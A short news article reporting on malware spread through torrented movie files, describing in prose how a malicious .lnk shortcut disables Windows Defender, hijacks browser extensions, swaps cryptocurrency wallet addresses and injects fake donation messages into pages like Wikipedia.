loader gif

Newly discovered malware leverages torrented movies to steal Crypto and manipulate Google Search

Newly discovered malware leverages torrented movies to steal Crypto and manipulate Google Search
  • The new threat seems to emerge from torrent sites such as The Pirate Bay, where the malware is often disguised as movie files.
  • Placing itself as a Windows shortcut file when downloaded, it executes a string of instructions in the background to steal cryptocurrency tokens.

If you are a movie buff and download movies from torrents, chances are that your device could get infected with new malware that can steal your cryptocurrency, and modify your online search results too.

On Saturday, the activity of the new malware was detailed in an article published by Bleeping Computer. A security researcher named 0xffff0800 found out an odd-looking file after he downloaded The Girl in the Spider’s Web (a movie based on Stieg Larsson’s Millenium book series) from The Pirate Bay.

The file has a ‘.lnk’ extension which automatically runs a PowerShell command on Windows OS, and can download additional malicious payloads to the system.

Malware messes with Google Search results

The capabilities of the the '.lnk' file extend to the web as well. It modifies web pages such as that of Google and Yandex search results. What’s more, it also replaces cryptocurrency wallet addresses of the victim with that of the attacker's wallet address.

“To do this, the malware modifies registry keys to disable Windows Defender protection if Microsoft's antivirus is enabled. It also forcibly installs in Firefox an extension called 'Firefox Protection' and hijacks the Chrome extension called 'Chrome Media Router', with the ID ‘pkedcjkdefgpdelpbcmbmeomcjbeemfm’," reported Bleeping Computer.

Along with the ‘.lnk’ file, there were two hidden ‘.exe’ files as well. However, these two would fail to execute due to an erroneous code written by the attackers.

Fake Wikipedia ‘Donation’

Web injection by the malware also affects Wikipedia. The site’s main page displays a fake donation message which has a bitcoin and ethereum wallet address in the end.

The Russian social networking website VKontakte is also targeted through web page injection to insert code for various offers (torrent trackers or cryptocurrency).

This movie malware is bound to stay within the filesystem if it is not quarantined. It is advisable for all users to avoid downloading movie torrents from suspicious sites as it could end up in a malware attack persisting on your device for a long time.

loader gif